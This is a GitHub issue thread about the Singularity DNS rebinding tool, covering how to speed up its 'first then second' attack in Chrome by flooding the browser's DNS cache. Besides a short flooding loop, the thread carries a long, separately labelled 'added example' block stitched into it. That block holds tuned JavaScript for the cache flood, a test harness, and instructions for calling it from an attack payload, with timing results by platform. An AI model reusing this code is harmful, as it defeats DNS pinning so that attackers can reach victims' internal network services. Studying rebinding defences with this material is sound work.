Speeding up "First then Second"
Closed this issue · 6 comments
Hello,
In the paper "FireDrill: Interactive DNS Rebinding" the authors worked out that DNS rebinding could be accelerated by flooding the DNS cache of the browser. So instead of waiting for the pinned entries to expire, we can flood the cache with valid entries.
For example, the cache size of the Chrome browser is about 1000 entries. Because of this I integrated the following loop in the payload.js file.
```js
// Request ~1000 distinct hostnames so the browser's DNS cache fills up and
// evicts the pinned entry for the target. The responses are irrelevant, so
// failures (CORS errors, refused connections) are ignored.
for (let i = 0; i < 1000; i++) {
  const url = "http://n" + i + ".rebind.it";
  fetch(url).catch(() => {});
}
```
With this loop I could perform the "first then second" attack in ~5 seconds. I successfully tested this with the Chrome browser, IP=127.0.0.1 and interval = 1s.
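The flooding loop above, generalized as an added example (this is not code from the issue author or from the Singularity project). It assumes the attacker controls a wildcard DNS zone (the `rebind.it` pattern from the issue), that the cache-size estimate of ~1000 entries is an assumption to tune per browser, and that only the DNS lookup matters, so request failures are ignored. The function names `buildFloodUrls` and `floodDnsCache` are hypothetical; the `fetcher` parameter is injectable so the block can be exercised offline without a browser:

```javascript
// Added example, not part of Singularity: evict the pinned DNS entry for the
// target by filling the browser's DNS cache with many distinct hostnames.
// Assumptions: a wildcard zone under `domain` resolves every label, and the
// cache size (DEFAULT_CACHE_SIZE) is an estimate to adjust per browser.

const DEFAULT_CACHE_SIZE = 1000; // assumed estimate for Chrome, per the issue

// Build `count` distinct hostnames; each one costs the browser one DNS cache
// entry. `tag` is a per-run nonce so a second flood in the same browser
// session does not just refresh hostnames that are already cached.
function buildFloodUrls(domain, count = DEFAULT_CACHE_SIZE, tag = Date.now().toString(36)) {
  const urls = [];
  for (let i = 0; i < count; i++) {
    urls.push(`http://n${i}-${tag}.${domain}/`);
  }
  return urls;
}

// Issue the requests with bounded concurrency so the flood does not hit the
// browser's connection limits and stall (the Chromium-in-a-VM "hang" symptom).
// Errors are swallowed: a rejected fetch still triggered the DNS lookup.
// `fetcher` defaults to the global fetch but can be injected for testing.
// Returns the number of requests attempted.
async function floodDnsCache(urls, { concurrency = 50, fetcher = globalThis.fetch } = {}) {
  let next = 0;
  let attempted = 0;

  async function worker() {
    // `next++` happens synchronously before any await, so no URL is fetched twice.
    while (next < urls.length) {
      const url = urls[next++];
      attempted++;
      try {
        // no-cors: opaque response is fine; no-store: never serve from HTTP cache
        await fetcher(url, { mode: 'no-cors', cache: 'no-store' });
      } catch (_) {
        // connection refused / CORS failure: the resolution already happened
      }
    }
  }

  await Promise.all(Array.from({ length: concurrency }, worker));
  return attempted;
}

// Offline demonstration with a fake fetcher (constructed for this example):
// one hostname "fails", the rest succeed, and the flood still covers all URLs.
async function demo() {
  const urls = buildFloodUrls('rebind.it', 1000, 'demo');
  const fakeFetch = async (url) => {
    if (url.endsWith('7-demo.rebind.it/')) throw new Error('connection refused');
    return { ok: true };
  };
  return floodDnsCache(urls, { concurrency: 25, fetcher: fakeFetch });
}
```

In a payload you would call `floodDnsCache(buildFloodUrls('rebind.it'))` once the first resolution is pinned, then resume polling the target hostname; the second resolution should then arrive well before the original TTL would have let it.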
I cannot reproduce this test successfully. We had this feature in previous versions of Singularity and then removed it. Can you please provide more details about your test? Chrome version, OS and version? Do you clear the Chrome DNS cache before running the test? Did you place this snippet of code within the global scope of payload.js?
We re-introduced DNS cache flooding as an advanced option in the Singularity Manager UI. In one test environment, it reduced the rebinding time from ~60s to ~20s for Google Chrome only, using the "first then second" DNS rebinding attack strategy and with an interval of 1s.
Successfully tested cache eviction with the following platforms:
- Chrome/macos: ~20s
- Chrome/windows 7: ~30s
It does not work on Firefox/all platforms. Chromium on Linux in a VM seems to hang.
Nice, thank you!
It is deployed on rebind.it (http://rebind.it:8080/manager.html) if you want to experiment with it.